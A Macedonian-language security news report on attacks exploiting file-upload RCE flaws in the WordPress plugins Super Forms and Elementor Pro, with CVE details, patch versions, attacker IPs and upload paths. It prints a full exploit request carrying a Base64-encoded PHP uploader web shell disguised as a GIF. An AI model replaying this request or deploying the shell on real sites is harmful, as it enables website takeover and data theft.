Преглед на приватноста

Оваа веб-страница користи колачиња за да ви обезбеди најдобро можно корисничко искуство. Информациите за колачињата се складираат во вашиот прелистувач и извршуваат функции како препознавање кога се враќате на нашата веб-страница и им помагаат на нашите програмери да разберат кои делови од веб-страницата ви се најинтересни и најкорисни.

Строго неопходни колачиња

Строго неопходните колачиња треба да бидат овозможени во секое време за да можеме да ги зачуваме вашите поставки за колачиња.

Над 440.000 обиди за експлоатација ги таргетираат пропустите за RCE во Super Forms и Elementor Pro

Напаѓачите ги искористуваат две критични безбедносни пропусти во WordPress-приклучоците Super Forms и Elementor Pro, според наодите на Wordfence.

Станува збор за следните пропусти:

  • CVE-2026-14894 (CVSS оцена: 9.8) – Пропуст поради недостиг на валидација на типот на датотеката во Super Forms – Drag & Drop Form Builder, кој им овозможува на неавтентицирани напаѓачи да прикачуваат датотеки од кој било тип, вклучително и извршливи PHP-датотеки, што може да доведе до далечинско извршување на код (RCE). Пропустот е поправен во верзијата 6.3.314.
  • CVE-2026-32475 (CVSS оцена: 9.0/9.8) – Безбедносен пропуст во Elementor Pro кој им овозможува на неавтентицирани напаѓачи да прикачуваат датотеки од кој било тип, вклучително и извршливи PHP-датотеки, што може да доведе до далечинско извршување на код (RCE). Пропустот е поправен во верзијата 4.2.2.

Како и кај другите пропусти што овозможуваат прикачување произволни датотеки, напаѓачот може да ги искористи за да постави PHP web shell на веб-страницата и да извршува произволен код. Потоа, ова може да се злоупотреби за креирање администраторски сметки, извлекување податоци или целосно преземање на контролата врз WordPress-страницата.

Вреди да се напомене дека деталите за CVE-2026-32475 беа објавени од Patchstack минатиот месец. За успешна експлоатација, целната веб-страница мора да има најмалку една објавена Elementor-страница која содржи Form widget со поле File Upload.

Во два извештаи објавени оваа недела, Wordfence наведува дека веќе блокирал повеќе од 250.000 обиди за експлоатација насочени кон CVE-2026-14894, како и повеќе од 190.000 обиди насочени кон CVE-2026-32475.

Експлоатација на CVE-2026-14894

Во нападите со кои се искористува CVE-2026-14894, истражувачите откриле дека напаѓачите испраќаат HTTP POST-барање до:

/wp-admin/admin-ajax.php

преку endpoint-от super_submit_form, при што барањето содржи поле за датотека со Base64-кодиран PHP payload и име на датотека контролирано од напаѓачот, како во примерот подолу:

action=super_submit_form&form_id=2&sf_nonce=04c3aa2046&data={"sf_upload_field": {"type": "files", "files": [{"datauristring": "data:image/gif;base64,PD9waHAgaWYoaXNzZXQoJF9GSUxFU1siZmlsZSJdKSl7JHRhcmdldD1iYXNlbmFtZSgkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSk7aWYobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImZpbGUiXVsidG1wX25hbWUiXSwkdGFyZ2V0KSl7ZWNobyLinIUgVXBsb2FkZWQ6IDxhIGhyZWY9JyR0YXJnZXQnPiR0YXJnZXQ8L2E+Ijt9ZWxzZXtlY2hvIuKdjCBVcGxvYWQgZmFpbGVkISI7fWV4aXQ7fT8+PCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PHRpdGxlPk11c2hyMDB3IFVwbG9hZGVyPC90aXRsZT48L2hlYWQ+PGJvZHkgc3R5bGU9ImJhY2tncm91bmQ6IzBhMGEwYTtjb2xvcjojMDBmZjAwO2ZvbnQtZmFtaWx5Om1vbm9zcGFjZTtkaXNwbGF5OmZsZXg7anVzdGlmeS1jb250ZW50OmNlbnRlcjthbGlnbi1pdGVtczpjZW50ZXI7aGVpZ2h0OjEwMHZoO21hcmdpbjowOyI+PGZvcm0gbWV0aG9kPSJQT1NUIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBzdHlsZT0iYmFja2dyb3VuZDojMTExO3BhZGRpbmc6NDBweDtib3JkZXI6MnB4IHNvbGlkICMwMGZmMDA7Ym9yZGVyLXJhZGl1czoxMHB4O3RleHQtYWxpZ246Y2VudGVyOyI+PGgyPvCfk6QgVVBMT0FEPC9oMj48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgcmVxdWlyZWQgc3R5bGU9ImJhY2tncm91bmQ6IzBhMGEwYTtjb2xvcjojMDBmZjAwO2JvcmRlcjoxcHggc29saWQgIzAwZmYwMDtwYWRkaW5nOjEwcHg7Ym9yZGVyLXJhZGl1czo1cHg7Ij48YnI+PGJyPjxidXR0b24gdHlwZT0ic3VibWl0IiBzdHlsZT0iYmFja2dyb3VuZDojMDBmZjAwO2NvbG9yOiMwYTBhMGE7cGFkZGluZzoxMHB4IDMwcHg7Ym9yZGVyOm5vbmU7Ym9yZGVyLXJhZGl1cz01cHg7Zm9udC13ZWlnaHQ6Ym9sZDtjdXJzb3I6cG9pbnRlcjsiPuKshiBVcGxvYWQ8L2J1dHRvbj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4=", "value": "Mushr00w_upl.php", "name": "Mushr00w_upl.php", "label": "attachment"}]}}

Прикачената датотека, иако е означена со типот на содржина „data:image/gif;base64“, всушност е PHP web shell за прикачување датотеки („Mushr00w_upl.php“), кој потоа служи како средство за прикачување дополнителни payload-и на веб-страницата.

Нападите во кои се злоупотребува приклучокот Super Forms потекнуваат од следните IP-адреси:

  • 103.168.147.235
  • 103.168.146.131
  • 103.154.152.178
  • 103.170.97.7
  • 182.10.130.51
  • 189.4.122.140
  • 129.227.46.143
  • 64.176.209.104
  • 103.164.182.122
  • 37.9.33.62

Според наводите, злонамерната активност започнала на 14 јули 2026 година, а потоа достигнала врв од повеќе од 40.000 барања за експлоатација на 18 август 2026 година.

Експлоатација на CVE-2026-32475

„Напаѓачот го испраќа полето File Upload од формуларот како низа (array), каде што првиот елемент е празен, а вториот содржи PHP payload со име на датотека со наставка .php. Токму оваа структура го активира заобиколувањето на валидацијата“, наведува компанијата за безбедност на WordPress.

„Откако ќе биде запишана, прикачената PHP-датотека се сместува во директориумот:

/wp-content/uploads/elementor/forms/

под случајно генерирано име на датотека, но со наставката .php зададена од напаѓачот. Напаѓачот потоа може директно да пристапи до датотеката и да извршува произволни команди на серверот.“

Обидите за експлоатација насочени кон CVE-2026-32475 започнале на 19 август 2026 година, а потекнувале од следните IP-адреси:

  • 2602:fa59:10:7a1::1
  • 185.196.220.85
  • 103.84.230.85
  • 103.90.148.202
  • 216.126.225.208
  • 167.254.240.75
  • 167.254.241.119
  • 114.10.17.253
  • 114.10.45.151
  • 2406:ef80:2:7d19::1

Сопствениците на WordPress-страници кои ги користат двата приклучоци се советуваат **веднаш да ги применат достапните безбедносни закрпи

Извори:

  • The Hacker News – Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws The Hacker News